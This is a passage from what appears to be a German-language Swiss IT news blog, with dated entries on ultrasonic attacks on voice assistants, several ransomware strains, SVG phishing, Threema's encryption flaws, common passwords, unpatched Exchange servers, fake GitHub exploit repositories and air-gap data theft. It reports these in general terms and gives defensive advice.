Die Angriffsmethode funktioniert, weil die Mikrofone in smarten Geräten auf Töne reagieren können, die fast schon im Ultraschall-Bereich sind - das menschliche Ohr nimmt diese gar nicht wahr. Diese Signale könnten beispielsweise in Youtube-Videos oder Multimedia-Inhalten auf Websites eingebettet sein. In ihren Versuchen dauerten die schädlichen Töne lediglich 0,77 Sekunden. 

Die Forschenden formulierten zwei Formen von NUIT-Attacken: NUIT-1 und NUIT-2. 

  • Bei NUIT-1 ist ein Gerät zugleich Sender und Empfänger. Ein Smartphone spielt unwissentlich das schädliche Audiosignal ab. Dieses Signal bringt das Smartphone anschliessend dazu, eine bestimmte Handlung auszuführen - wie etwa eine Website aufrufen, eine Textnachricht verschicken, eine vernetzte Alarmanlage abschalten oder auch ein anderes IoT-Gerät ansteuern. 
  • Bei NUIT-2 wird der Angriff - also das Audiosignal - von einem Gerät ausgesendet und von einem zweiten Gerät mit einem Mikrofon empfangen. Die Attacke könnte also von einer Website kommen, die man am PC öffnet, und auf einen Smartspeaker im Raum abzielen. Es wäre sogar denkbar, während eines Videocalls einen solchen Ton abzuspielen, wie die Forschenden erklären. 

Apple-Nutzerinnen und -Nutzer sind hier im Vorteil laut den Forschenden. 16 der 17 getesteten Sprachassistenten reagierten auf alle Befehle, egal mit welcher Stimme diese gegeben wurden - auch mittels KI generierten Stimmen. Bei Apples Siri kann man jedoch die Stimme auch quasi als akustischen Fingerabdruck nutzen. Das heisst, der Angreifer müsste die Stimme des Benutzers bzw. der Benutzerin imitieren, um das Gerät zu kapern. 

Die Forschenden empfehlen, stets ein Auge auf die Mikrofonnutzung des Smartphones zu halten. Ausserdem reduziere es bereits das Risiko, auf diese Weise angegriffen zu werden, wenn man Videos mit Kopfhörern statt mit Lautsprechern schaue.

Die Verwendung von unhörbaren Audiosignalen ist nicht neu. Vergangenen Sommer präsentierte etwa der Sicherheitsforscher Mordechai Gur, wie man mit Resonanzfrequenzen im Ultraschallbereich Dateien von einem physisch und logisch vom Netz getrennten PC stehlen kann (lesen Sie mehr dazu im Blogeintrag vom 30. August 2022: "Air-Gap: Wie man mit LEDs physisch getrennte PCs bestiehlt").


14.03.2023 - 16:38 Uhr

Medusa-Ransomware richtet ihren Blick auf die Welt - und stiftet Verwirrung

Die Ransomware Medusa tritt in die Pedale. War sie zuvor nur geringfügig aktiv, steigerten die Betreiber hinter dem Erpresserprogramm nun ihre Bemühungen, auch weltweit Unternehmen zu infizieren. 

Dies sorgt jedoch auch für ein gewisses Mass an Verwirrung, wie Bleepingcomputer schreibt. Denn "Medusa" ist keine einzigartige und somit eindeutige Bezeichnung für ein Schadprogramm - nicht einmal für eine Ransomware. Zu den prominentesten Medusen gehören etwa ein auf Mirai basierendes Botnet, ein Android-Banking-Trojaner und das Ransomware-as-a-Service-Angebot "MedusaLocker".

 

 

Medusa wird insbesondere mit "MedusaLocker" oft in einen Topf geworfen. Es handelt sich jedoch um zwei klar unterschiedliche Schädlinge: der Erpresserbrief, die Tor-Website, die für die Kommunikation mit den Opfern genutzt wird, und die Verschlüsselungsmethode sind nicht dieselben. Ausserdem hängt Medusa den verschlüsselten Dateien die Endung .medusa an - MedusaLocker nutzt eine Vielzahl an Endungen.

Die Medusa-Ransomware ist seit Juni 2021 aktiv. Nun lancierten die dafür verantwortlichen Cyberkriminellen einen Blog, auf dem sie gestohlene Daten veröffentlichen, wenn die Opfer kein Lösegeld zahlen wollen. Derartige Blogs sind üblich für Ransomware-Gangs, die es auf Unternehmen abgesehen haben. So können sie die Opfer gleich doppelt erpressen: mit den verschlüsselten Daten und mit der Drohung, sensible Daten zu veröffentlichen. 

Die Opfer können zwischen drei kostenpflichtige Optionen wählen: den Countdown bis zu Veröffentlichung der Daten verlängern, alle Daten löschen oder alle Daten herunterladen. Die letzten beiden Optionen kosten laut dem Bericht 500'000 US-Dollar. Das eigentliche Lösegeld soll im 7-stelligen Bereich liegen. Bislang ist noch keine Schwachstelle in der Verschlüsselung bekannt, mit der sich diese knacken lassen könnte. 

28.02.2023 - 15:25 Uhr

Get over here: Ransomware "Mortalkombat" holt zum Doppelschlag aus - ist aber bereits zahnlos

Seit Anfang des Jahres treibt eine neue Ransomware ihr Unwesen. Das Schadprogramm namens "Mortalkombat", benannt nach der Videospielserie "Mortal Kombat", greift seine Opfer jedoch nicht im Alleingang an. Mit der Ransomware werden die Opfer erpresst, während ein zweiter Schädling Kryptowährungen auf dem Rechner stiehlt. 

Die Cyberkriminellen hinter "Mortalkombat" infizieren ihre Opfer nämlich zugleich mit dem Clipper "Laplas". Dieser sucht in der Windows-Zwischenablage nach Adressen für Krypto-Wallets. Findet das Schadprogramm eine Empfängeradresse, ersetzt es diese durch die Adresse der Betrüger. So landen überwiesene Gelder bei den Cyberkriminellen. Die Malware kommt via schädliche ZIP-Dateien auf die Rechner der Opfer.

Laut unabhängigen Analysen von Cisco Talos und Malwarebytes basiert die "Mortalkombat"-Ransomware auf der "Xorist"-Ransomware-Familie. Das Schadprogramm wurde demnach mittels eines Builders erstellt, mit dem Cyberkriminelle die Malware individuell gestalten können. 

"Nicht sehr fortschrittlich"

Das Schadprogramm sei nicht sehr fortschrittlich, schreibt Cisco Talos. "Mortalkombat" verschlüssle nämlich auch Systemdateien und -anwendungen. Für gewöhnlich meiden derartige Verschlüsselungsprogramme diese Dateien, damit das angegriffene System nicht instabil wird. 

"Mortalkombat" hat zwar keine Wiper-Funktionalität. Es beschädigt jedoch Systemordner wie etwa den Papierkorb. Die Opfer können anschliessend keine Dateien daraus abrufen. Ferner deaktiviert der Schädling das Windows-Befehlsfenster und entfernt alle Einträge aus dem Startmenü. Die Ransomware ändert zudem den Hintergrund zu einem Bild mit Motiven aus den "Mortal Kombat"-Videospielen. Das Desktopbild ist zugleich auch der Erpresserbrief. 

Derzeit ist das Malware-Doppelpack vor allem in den USA aktiv. Im Vereinigten Königreich, in der Türkei und auf den Philippinen wurden ebenfalls bereits erste Opfer gemeldet. 

Dekryptor steht schon bereit

Das noch frische Verschlüsselungsprogramm verlor jedoch bereits an Bisskraft. Bitdefender bietet online einen Universal-Dekryptor an. Mit diesem lassen sich laut dem rumänischen Sicherheitsanbieter Dateien wieder freigeben, die mit der "Mortalkombat"-Ransomware verschlüsselt wurden. 

Nutzer könnten bestimmte Pfade für eine Suche nach verschlüsselten Daten angeben oder auch das ganze System durchsuchen. Dies laufe auch ohne Menü über die Kommandozeile, sodass die Suche nach verschlüsselten Dateien in grossen Netzwerken bequem im Hintergrund ablaufe. 

Das kostenlose Tool können Interessierte bzw. Betroffene hier herunterladen.

23.01.2023 - 17:16 Uhr

Mit leeren Bildern die Cyberabwehr aushebeln

Sicherheitsforschende des E-Mail-Security-Anbieters Avanan haben eine neue Phishing-Methode entdeckt. Die Methode tauften sie "Blank Image". Sie ermöglicht es den Phishern, das Weiterleiten auf infizierte URLs zu verschleiern. Die Methode werde bereits genutzt, wie das Unternehmen mitteilt.

Die Phisher nutzen dabei eine leere als HTML-Anhang getarnte SVG-Datei aus. Dabei handelt es sich um ein Dateiformat für Vektorgrafiken - diese können auch HTML-Script-Tags enthalten. Die manipulierte SVG-Datei bei einer "Blank Image"-Attacke enthält jedoch kein Bild - auf dem Screen wird also nichts gerendert. Stattdessen arbeitet im Hintergrund das im SVG-File eingebettete JavaScript. Dieses leite das Opfer automatisch weiter auf die schädliche URL. 

"Dies ist eine innovative Methode, um die wahre Absicht der Nachricht zu verschleiern", schreibt Avanan in einem Blogeintrag. "Sie umgeht Virustotal und wird nicht einmal vom herkömmlichen Click-Time-Schutz gescannt." Die meisten Sicherheitsdienste seien hilflos gegen derartige Attacken. 

Für ihre Attacken nutzen die Betrüger eine vermeintliche Aufforderung, Dokumente von DocuSign zu prüfen und zu signieren. Das verschickte Dokument trägt die Bezeichnung "Scanned Remittance Advice.htm". Klicken die Opfer auf den HTML-Anhang, wird die "Blank Image"-Attacke gestartet. 

Mehr zum Thema Phishing und wie man den Betrug (fast) immer erkennt, lesen Sie hier

16.01.2023 - 15:36 Uhr

Diese Trojaner haben es auf Schweizer Firmen abgesehen

Die Schweiz ist zurzeit ein Trojanerland. 7 der Top-10-Schadprogramme hierzulande sind eine Form von Trojaner. Dies zeigt die aktuelle "Most Wanted Malware"-Liste von Check Point für den Monat Dezember. Die gesamte Liste hat 17 Einträge - wovon 11 Trojaner sind. 

Der israelische IT-Security-Anbieter stellt die Liste der aktivsten Schadprogramme monatlich zusammen. Aktuell führt der Banking-Trojaner Qbot bzw. Qakbot die Liste an. 11,03 Prozent der Schweizer Firmen seien von diesem Schädling betroffen. Ein klarer Anstieg seit November: Im Vormonat waren es lediglich 3,74 Prozent. 

Mit Anubis schaffte es im Dezember ein weiterer Banking-Trojaner in Check Points Top 10. Dieser Android-Schädling kletterte auf den 8. Platz mit einer Infektionsrate von 0,89 Prozent - knapp über der globalen Rate von 0,7 Prozent. 

Noch zahlreicher als Banking-Trojaner waren im Dezember die Remote-Access-Trojaner (RAT). Mit diesen Schadprogrammen versuchen Hacker, aus der Ferne Zugriff auf fremde Rechner zu erhalten. Insgesamt 5 schafften es auf die Liste, wovon 3 in den Top 10 vertreten sind: Remcos, Blindingcan, AgentTesla. 

Abgesehen von Trojanern sah Check Point in der Schweiz auch noch weitere Bedrohungen. Auf Platz 4 ist etwa XMRig zu finden. 1,6 Prozent der Schweizer Firmen seien von dieser CPU-Mining-Software betroffen. Dies ist jedoch deutlich weniger als der weltweite Schnitt von 3,25 Prozent. Mit Formbook schaffte es ein Infostealer auf den 7. Platz. Und abgerundet wird die Top 10 durch die über Ransomware-as-a-Service angebotene Malware DarkSide.

Check Points vollständige "Most Wanted Malware"-Liste für die Schweiz im Dezember 2022:

  1. Qbot (Banking-Trojaner): 11,03 Prozent der Schweizer und 7,29 Prozent der globalen Firmen betroffen.
  2. Kryptik (Trojaner): 2,14 Prozent der Schweizer und 0,48 Prozent der globalen Firmen betroffen.
  3. Emotet (modularer Trojaner): 1,96 Prozent der Schweizer und 4,38 Prozent der globalen Firmen betroffen.
  4. XMRig (Cryptominer): 1,60 Prozent der Schweizer und 3,25 Prozent der globalen Firmen betroffen.
  5. Remcos (RAT): 1,25 Prozent der Schweizer und 1,45 Prozent der globalen Firmen betroffen.
  6. Blindingcan (RAT): 1,07 Prozent der Schweizer und 0,35 Prozent der globalen Firmen betroffen.
  7. Formbook (Infostealer): 1,07 Prozent der Schweizer und 2,26 Prozent der globalen Firmen betroffen.
  8. Anubis (Banking-Trojaner): 0,89 Prozent der Schweizer und 0,70 Prozent der globalen Firmen betroffen.
  9. AgentTesla (RAT): 0,71 Prozent der Schweizer und 1,23 Prozent der globalen Firmen betroffen.
  10. DarkSide (Ransomware): 0,53 Prozent der Schweizer und 0,32 Prozent der globalen Firmen betroffen.
  11. Tofsee (Trickler): 0,53 Prozent der Schweizer und 0,90 Prozent der globalen Firmen betroffen.
  12. Scrinjet (Trojaner): 0,53 Prozent der Schweizer und 0,47 Prozent der globalen Firmen betroffen.
  13. Nanocore (RAT): 0,53 Prozent der Schweizer und 1,54 Prozent der globalen Firmen betroffen.
  14. GhOst (Backdoor): 0,53 der Schweizer und 0,76 Prozent der globalen Firmen betroffen.
  15. AveMaria (RAT): 0,53 Prozent der Schweizer und 0,37 Prozent der globalen Firmen betroffen.
  16. AsyncRat (RAT): 0,53 Prozent der Schweizer und 0,50 Prozent der globalen Firmen betroffen.
  17. Mirai (Botnet): 0,53 Prozent der Schweizer und 0,50 Prozent der globalen Firmen betroffen.

09.01.2023 - 12:03 Uhr

ETH entdeckt Schwachstellen in Threemas Verschlüsselung

Ein Forscherteam des Informatik-Departements der ETH Zürich hat Threema auf den Zahn gefühlt. Die Gruppe für angewandte Kryptographie prüfte die Verschlüsselung des Schweizer Messenger-Dienstes auf Schwachstellen - und wurde fündig. Am 9. Januar publizierten die Forschenden ein Paper mit sieben möglichen Angriffsszenarien. Diese beziehen sich allerdings auf das alte Kommunikationsprotokoll des Messengers. Threema wechselte im Dezember auf ein neues System namens "Ibex", wie Sie hier lesen können. Die gefundenen Lücken wurden laut Threema im neuen Protokoll berücksichtigt.

Das ETH-Team konnte im Rahmen ihrer Analyse etwa die Authentifizierung knacken, indem es die fehlende Trennung der Schlüssel zwischen den verschiedenen Unterprotokollen ausnutzte, wie die ETH mitteilt. Ferner gelang es den Forschenden auch, die privaten Schlüssel von Nutzenden wiederherzustellen. Diese Private Keys benötigt man, um verschlüsselte Nachrichten wieder lesbar zu machen. Das heisst, wenn Unbefugte diesen Schlüssel wiederherstellen können, ist die komplette Verschlüsselung hinfällig. 

Mehr zum Thema Verschlüsselung und wie moderne sowie altertümliche Methoden funktionieren, lesen Sie hier

"Mangel an Verständnis" vs. "realitätsfern"

Je nach Quelle zeigt sich ein anderes Bild: Die ETH - unter anderem via einem Bericht in der NZZ - schiesst mit scharfer Munition auf den Messenger-Dienst Threema. So zitiert die Zeitung etwa den ETH-Professor und Mitautor des Papers Kenneth Paterson mit den Worten: "Die Verschlüsselung von Threema hinkt mehrere Jahre hinterher." Das Konzept der Verschlüsselung weise grundlegende Schwächen auf. Der Professor stellt auch Threemas „tiefergehendes Verständnis von Kryptografie“ in Frage. 

Threema wiederum bezeichnet die gefundenen Mängel als "realitätsfern". Keine der Schwachstellen hätte jemals "nennenswerte Relevanz in der Praxis" gehabt, schreibt das Unternehmen. Zudem würden die meisten von umfassenden Vorbedingungen ausgehen, die selbst schon folgenschwerer seien, als die gefundene Sicherheitslücke selbst. Laut der Mitteilung des Unternehmen benötige man für eines der Angriffsszenarien etwa physischen Zugriff auf ein entsperrtes Android-Gerät über einen Zeitraum von etwa zwölf Stunden und ohne, dass in Threema eine Passphrase gesetzt sei. Oder anders gesagt: Das gesamte Gerät müsse dafür bereits kompromittiert sein.

"Die Erkenntnisse der Forscher sind nicht gravierend, sondern rein akademischer Natur", zitiert die NZZ Threema-CEO Martin Blatter. "Die Daten unserer Nutzer waren nie in Gefahr."

Threema holt nach mit "Ibex"

Einer der Steine des Anstosses ist das Konzept "Perfect Forward Secrecy". Threema nutzt einen privaten Schlüssel, mit dem alle Nachrichten verschlüsselt werden. Bei "Perfect Forward Secrecy" hingegen wird für jede Nachricht oder in regelmässigen Abständen jeweils ein neuer Schlüssel generiert. Sollte dieser also in die falschen Hände gelangen, könnte man damit keine oder nur wenige alte Nachrichten entschlüsseln. 

Threema-Konkurrent Signal setzt seit 2014 auf "Perfect Forward Secrecy". Bei Threema kam dieses Feature erst mit dem Wechsel auf "Ibex" Ende 2022. Die von der ETH gefundenen Mängel wurden laut Threema bei der Entwicklung des neuen Systems berücksichtigt. Wer "Perfect Forward Secrecy" in Threema nutzen will, muss dies zunächst - für jeden Kontakt einzeln - aktivieren. Dazu muss man die Kontaktdetails öffnen; in der Übersicht lässt sich das Feature einschalten. 

Die ETH-Forschenden hatten Threema ihre Befunde im Oktober 2022 gemeldet und die branchenüblichen 90 Tage gewartet, bevor sie diese öffentlich machten. 

Übrigens: Die von der ETH bemängelte und nicht mehr aktuelle Version von Threema konnte in den vergangenen Jahren einige nennenswerte Kunden überzeugen. Darunter die Bundesverwaltung, die Schweizer Armee und die Schweizer Polizei.

28.11.2022 - 11:59 Uhr

Echt jetzt? "Password" ist das beliebteste Passwort in diesem Jahr

Es ist wieder einmal so weit: Nordpass zeigt der Welt auf, wie unnütz ein Passwortschutz zuweilen ist. Der britische Anbieter von Passwortmanagern stellt jährlich eine Liste der häufigsten Passwörter zusammen. Die aktuelle Liste ist - wie jedes Jahr - voller Alibi-Passwörter wie "password", "123456", "qwerty" und Co. 

Wieso Alibi-Passwörter? Weil diese Passwörter nur eingetippt werden, um einen Passwortzwang zufrieden zu stellen. Den Schutz erhöhen sie nicht. Mit wenigen Ausnahmen lassen sich alle 200 gelisteten Kennwörter in wenigen Sekunden mit Cracking-Tools knacken. 

Bei diesen Losungen sollte man aber eigentlich gar nicht angeben, wie lange derartige Tools benötigen, um den Passwortschutz zu brechen. Stattdessen könnte man sie besser in den Anzahl Versuchen messen, die man benötigt, bevor man sie - gänzlich ohne technische Hilfsmittel - erraten kann. Der Messwert dürfte bei den meistgenutzten Passwörtern im einstelligen Bereich bleiben. 

Wie viele Personen ihr Passwort tatsächlich nur pro forma eintippen, können die Daten nicht verraten. Gewiss handelt es sich in einigen Fällen auch um ab Werk einprogrammierte Standardpasswörter, die nach der Inbetriebnahme nicht abgeändert wurden. Aber auch das ist ein klares Zeichen, dass an der Passworthygiene gearbeitet werden muss.

Die 10 häufigsten Passwörter weltweit in 2022:

  1. password (4'929'113 Einträge)
  2. 123456 (1'523'537 Einträge)
  3. 123456789 (413'056 Einträge)
  4. guest (376'417 Einträge)
  5. qwerty (309'679 Einträge)
  6. 12345678 (284'946 Einträge)
  7. 111111 (229'047 Einträge)
  8. 12345 (188'602 Einträge)
  9. col123456 (140'505 Einträge)
  10. 123123 (127'762 Einträge)

Das aktuelle Top-Passwort "password" war zwar bereits in den vergangenen drei Jahren in den Top 5 - allerdings nur knapp. Die Nummer 1 in 2019 bis 2021 war jeweils "12345" oder "123456". 

Für die aktuelle Liste untersuchte Nordpass insgesamt 3 Terabyte an Daten aus 30 Ländern. Im Gegensatz zu früheren Ausgaben enthält die Liste dieses Jahr keine Angaben zur Passwortnutzung in der Schweiz. Hoffen, dass hierzulande die Passworthygiene besser ist, sollte man aber nicht. Im vergangenen Jahr war nämlich "123456" das meistgenutzte Kennwort in der Schweiz. 

Mehr zum Thema Passwortschutz und warum starke Passwörter nicht zwingend sichere Passwörter sind, lesen Sie hier.

21.11.2022 - 12:44 Uhr

Schweizer Admins schlafen - 2800 Server warten auf Sicherheitsupdate

Das Nationale Zentrum für Cybersicherheit (NCSC) erlebt wohl ein gewisses Déjà-vu. Das Kompetenzzentrum fordert derzeit die Betreiber von Microsoft-Exchange-Servern auf, ihre Systeme zu patchen. 

Konkret geht es um die Schwachstelle "ProxyNotShell". Diese ist seit September 2022 bekannt und wird bereits aktiv von Cyberkriminellen ausgenutzt. Am 8. November veröffentlichte Microsoft einen Patch, der die Sicherheitslücke schliesst

Und trotzdem: Zwei Wochen nach der Veröffentlichung des Patches gibt es gemäss dem NCSC noch immer 2800 über das Internet erreichbare Server, die weiterhin verwundbar sind. Angreifern wäre es also möglich, "ProxyNotShell" auszunutzen, beliebigen Code aus der Ferne auszuführen und die Server zu kompromittieren. Die Betreiber riskieren also Ransomware-Attacken, einen Datendiebstahl oder vergleichbare Cyberangriffe.

Erinnerungen werden wach

Die aktuelle Lage erinnert an die Situation im Frühjahr 2021. Damals hatte Microsoft ebenfalls ein Sicherheitsupdate für seine Exchange-Server veröffentlicht. Die damit adressierte Schwachstelle war laut dem NCSC von einem ähnlichen Ausmass wie die aktuelle Sicherheitslücke. 

Das NCSC informierte daraufhin betroffene Unternehmen per Einschreiben darüber. In manchen Fällen mehrmals: Im März dieses Jahres kontaktierte das NCSC erneut 130 Schweizer Unternehmen, um sie über die Sicherheitslücke zu informieren. 

Und trotzdem: Mindestens ein Unternehmen reagierte nicht auf die Warnungen und wurde anschliessend Opfer einer Ransomware, wie das NCSC im April schilderte

Was jetzt zu tun ist

Das NCSC empfiehlt den Betreibern von Microsoft-Exchange-Servern, sicherzustellen, dass sämtliche Patches eingespielt sind. Microsoft stellt online ein Tool namens "HealthChecker" zur Verfügung, mit dem man die Server überprüfen kann. Zudem sollen die Betreiber ihre Server mit einem aktuellen Virenschutz scannen. Schliesslich empfiehlt das NCSC auch, die eigene Patch-Strategie zu prüfen und sicherzustellen, dass kritische Sicherheitsupdates auch ausserhalb der üblichen Wartungsfenster eingespielt werden.

Das NCSC kündigte zudem an, dass es Unternehmen, welche die nötigen Patches bis Anfang Dezember 2022 noch nicht eingespielt haben, wiederum per Einschreiben direkt benachrichtigen werde. Sofern diese identifizierbar sind.

Mehr Informationen zur "ProxyNotShell"-Schwachstelle und zum entsprechenden Sicherheitsupdate bietet Microsoft auf seiner Website.

25.10.2022 - 17:59 Uhr

Falsche Machbarkeitsnachweise auf Github verschleudern Malware

Security-Forscherinnen und -forscher nutzen die Github-Plattform gerne, um ihre Machbarkeitsnachweise für Exploits mit Gleichgesinnten zu teilen. So können diese die Schwachstellen und deren Schweregrad prüfen, sowie an Gegenmassnahmen arbeiten. Nicht alle, die Github nutzen, sind jedoch wirklich gleichgesinnt. 

Auf Github finden sich auch zahlreiche gefälschte Proof-of-Concepts (PoC), wie ein Forschungsteam des Institute of Advanced Computer Science der niederländischen Universität Leiden zeigt. 

Für eine wissenschaftliche Arbeit untersuchten die Forschenden 47'313 Repositorys – alle für Exploits von Schwachstellen, die zwischen 2017 und 2021 veröffentlicht wurden. Über 10 Prozent (beziehungsweise in Zahlen: 4893) wurden als schädlich eingestuft. Der Bericht unterschied drei Kategorien: 

  • 2864 verwiesen auf als schädlich gelistete IP-Adressen.
  • 1522 wurden durch Scans auf Virustotal als schädlich identifiziert.
  • 1069 verwiesen auf IP-Adressen, die sich in der AbuseIPDB-Datenbank wiederfinden. 

Der Bericht erwähnt auch, dass ein kleiner Teil der gefundenen schädlichen PoCs Schadprogramme verteilen. Diese sind teilweise noch immer auf Github zu finden, da die Plattform noch daran ist, alle gemeldeten Fake-Machbarkeitsnachweise zu löschen. Dem Portal Bleepingcomputer sagte das Forschungsteam, dass mindestens 60 mit Malware verseuchte Repositorys noch heruntergeladen werden können. 

Die Malware verteilenden falschen Machbarkeitsnachweise deckten ein breites Spektrum von Schädlingen ab: von schädlichen Python-Skripts über Infostealer und Remote-Access-Trojaner bis hin zur Cobaltstrike-Malware. 

Sicherheitsforschende (und auch andere Personen, die Github nutzen) sollten daher Vorsicht walten lassen. Wie anderswo im Internet gilt auch hier, ungeprüfte Quellen blind zu vertrauen ist keine gute Idee. Heruntergeladene Repositorys sollten gründlich geprüft werden, bevor man sie ausführt – und falls nötig, sollte man dies in einer Sandbox tun.

17.10.2022 - 12:39 Uhr

Neue Ransomware Venus bezirzt Windows-Rechner übers RDP

Eine neue Ransomware zeigt derzeit auf, was schief gehen kann, wenn ein Rechner öffentlich über das Remote Desktop Protocol (RDP) zugänglich ist. Das Schadprogramm namens Venus infiziert Rechner auch dann über das RDP, wenn man keine standardmässige Port-Nummer nutzt. 

Die Ransomware Venus ist erst seit Mitte August 2022 im Umlauf und zurzeit weltweit "ziemlich aktiv", wie "Bleepingcomputer" berichtet. Es gibt zwar ein anderes Erpresserprogramm, das seit 2021 sein Unwesen treibt und dieselbe verschlüsselte Dateierweiterung verwendet. Allerdings ist nicht klar, ob die beiden Schadprogramme verwandt sind. 

Ransomware killt Prozesse und löscht Logs

Nach dem Start versucht Venus, 39 Prozesse zu beenden - dabei handelt es sich um Microsoft-Office-Anwendungen und mit Datenbankservern verbundene Prozesse. Zudem löscht die Ransomware Logs sowie Volumeschattenkopien und sie deaktiviert die Datenausführungsverhinderung. Verschlüsselte Dateien erhalten die Endung ".venus". Ferner fügt die Ransomware jeder Datei noch den Filemarker "goodgamer" hinzu. Wozu, ist derzeit noch nicht klar. 

Sobald die Ransomware die Verschlüsselung abgeschlossen hat, blendet sie einen Erpresserbrief ein. Darin nennt sich die Ransomware auch selbst "Venus". Im Schreiben sind verschiedene Kontaktmöglichkeiten angeben, damit Opfer und Erpresser über die Höhe des Lösegelds verhandeln können. 

Um eine Infektion zu verhindern, sollte man das RDP immer mit einer Firewall abschirmen. Idealerweise sind die Remote-Desktop-Services nur über eine VPN-Verbindung erreichbar, wie es im Bericht heisst.

12.10.2022 - 11:29 Uhr

Wenn eine Ransomware sich für ein Wiper-Schadprogramm hält

Die Cybersecurity-Firma Cyble hat einen interessanten Fund gemacht: Eine Ransomware mit einer Identitätskrise. Dieser Schädling hält sich nur bedingt an das übliche Verhalten einer Ransomware – also infizieren, verschlüsseln, erpressen.

Die Cyberkriminellen hinter der Malware verteilen diese über gefälschte Pornowebsites. Die Websites fordern die Besuchenden automatisch auf, ein vermeintliches JPG-Bild herunterzuladen. Tatsächlich handelt es sich dabei aber um eine ausführbare Datei namens "SexyPhotos.JPG.exe". Da Windows standardmässig Dateiendungen ausblendet, dürfte diese Täuschung vielen Opfern nicht auffallen. 

Klickt ein Opfer auf das vermeintliche Bild, lädt der Schädling vier weitere .exe-Dateien (darunter "del.exe" und "windowss.exe") und eine Stapelverarbeitungsdatei auf den Rechner. Windowss.exe ist für die angebliche Verschlüsselung verantwortlich. 

Die Dateien auf infizierten Rechnern werden jedoch nicht verschlüsselt, sondern nur in generische Bezeichnungen umbenannt. Das heisst, anschliessend tragen alle Dateien Namen wie "Locked_1.Locked_fille", "Locked_2.Locked_fille", "Locked_3.Locked_fille" und so weiter – der Inhalt der Dateien bleibt jedoch unverändert. 

Fake-Verschlüsselung führt zu Fake-Erpressung

Der Schädling verteilt auch mehrere Kopien eines Erpresserbriefs auf dem Rechner. Laut diesem verlangen die Cyberkriminellen 300 US-Dollar in Bitcoin, um die Dateien wiederherzustellen. Sollte das Opfer nicht innert den nächsten drei Tagen zahlen, verdoppelt sich die Lösegeldsumme. Die Cyberkriminellen behaupten, dass sämtliche Dateien verschlüsselt, gestohlen und vom Rechner des Opfers gelöscht wurden. 

Nach einer Woche - drohen die Erpresser - lösche die Malware alle Dateien. Aber auch das kann der Schädling nicht. Nach der angeblichen Verschlüsselung versucht die Malware nämlich "dell.exe" auszuführen. Ohne Erfolg, denn aufgrund eines Programmierfehlers heisst die Datei auf dem Rechner "del.exe". Sollten die Cyberkriminellen diesen Fehler beheben, würde die Malware alle Laufwerke ausser C:\ löschen. 

Das Lösegeld sollte man nicht zahlen. Erstens: Die Dateien wurden nicht verschlüsselt. Zweitens: Die Cyberkriminellen haben keine Daten gestohlen. Und drittens: Auch wenn die Cyberkriminellen einen Decryptor liefern würden, könnte dieser die Umbenennung der Dateien unmöglich rückgängig machen. Denn die Malware speichert die ursprünglichen Namen während der Infektion nirgends ab. 

Die Motive der cyberkriminellen Entwickler sind nicht ganz klar. Laut Cyble ist das Ziel aber wohl die Löschung aller Dateien. Die vermeintliche Verschlüsselung diene nur dazu, die Opfer von der Löschaktion abzulenken. 

Malware-Analysten der Cybersecurity-Firma Cyderes Special Operations haben Ende September bereits vor einem vergleichbaren Schadprogramm gewarnt. Die Malware Exmatter verschlüsselt auch keine Dateien und löscht sie stattdessen. Allerdings erst nachdem diese tatsächlich gestohlen wurden statt nur angeblich. Lesen Sie hier mehr dazu.

12.09.2022 - 13:20 Uhr

Cthulhu World: Hacker erfinden Fake-Game, um Opfer zu täuschen

Manchmal klickt man auf E-Mail-Anhänge, auf die niemand hätte hereinfallen dürfen. Und manchmal geben sich die Cyberkriminellen aber auch richtig viel Mühe, ihre Opfer hinters Licht zu führen. Wie etwa bei "Cthulhu World".

Hinter dem Namen steckt angeblich ein Play-to-Earn-Game, wie der Sicherheitsforscher "iamdeadlyz" gemäss einem Bericht von "Bleeping Computer" herausfand. Also ein Videospiel, bei dem Gamer und Gamerinnen während des Spielens Kryptowährungen schürfen und verdienen können. Da derartige Spiele zunehmend beliebter werden, werfen auch Cyberkriminelle stets häufiger ein Auge darauf.

Damit das gefälschte Spiel "Cthulhu World" möglichst glaubwürdig wirkt, kreierten die Hacker entsprechende Websites (inklusive einer interaktiven Karte der Spielwelt), Discord-Gruppen, Social-Media-Accounts und eine Website des angeblichen Entwicklers. Die unterdessen vom Netz genommene Website war wohl eine Kopie eines echten Spiels, Alchemic World Project. Dessen Betreiber warnen aktuell ebenfalls vor dem Scam.

Gezielte Infektionen über Download-Codes

Die Cyberkriminellen sprachen ihre Opfer auf Twitter direkt an und fragten, ob sie für eine Belohnung in Ethereum "Cthulhu World" testen wollen. Wer zusagte, erhielt einen Download-Code, den man auf der gefälschten Website eingeben konnte. Statt des Spiels luden die Opfer jedoch ein Schadprogramm herunter. Abhängig vom Code infizierten die getäuschten Spieletesterinnen und –tester ihre Rechner entweder mit Raccoon Stealer, AsyncRAT oder der Redline-Malware. 

Über die Codes konnten die Angreifer vermutlich gezielt bestimmen, welches Opfer welche Malware erhält. Die Schadprogramme können gespeicherte Passwörter, sowie Cookies und den Inhalt einer Crypto-Wallet stehlen. 

Übrigens: Cthulhu ist ein fiktives kosmisches Wesen, das vom US-amerikanischen Autor phantastischer Horrorliteratur H. P. Lovecraft erschaffen wurde. Ein Wesen, das dermassen weit über der Menschheit steht, dass dessen Leid (und Auslöschung) ihn gar nicht interessiert. 
 

30.08.2022 - 12:36 Uhr

Air-Gap: Wie man mit LEDs physisch getrennte PCs bestiehlt

Wer seine Daten wirklich sicher aufbewahren will, trennt seine IT-Infrastruktur physisch und logisch vom Netz. Eine derartige Isolation bezeichnet man als "Air-Gap". Aber sind solche Systeme wirklich sicher? 

Nein, zumindest nicht vor denen, die kreative Lösungen finden können. Dazu zählt etwa Mordechai Guru, der Head of Research and Development des Cybersecurity Research Lab an der Ben-Gurion-Universität des Negev. Im August präsentierte Guri gleich zwei neue Methoden, wie man Daten von nicht vernetzten Systemen stehlen kann. 

Lauschen mit Gyroskopen

Die erste neue Methode - Gairoscope genannt - weist Ähnlichkeiten auf zu der von Guri in 2018 vorgestellten Mosquito-Attack-Methode. Damals zeigte der Sicherheitsexperte auf, wie eine Malware die Lautsprecher eines Handys so austricksen kann, dass sie Ultraschallsignale empfangen können. So konnte Guri einen Kommunikationskanal zwischen dem abgetrennten Rechner und einem Smartphone aufbauen - nur mit Lautsprechern. Eine Malware im Rechner sendet, ein weiteres Schadprogramm im Handy lauscht. 

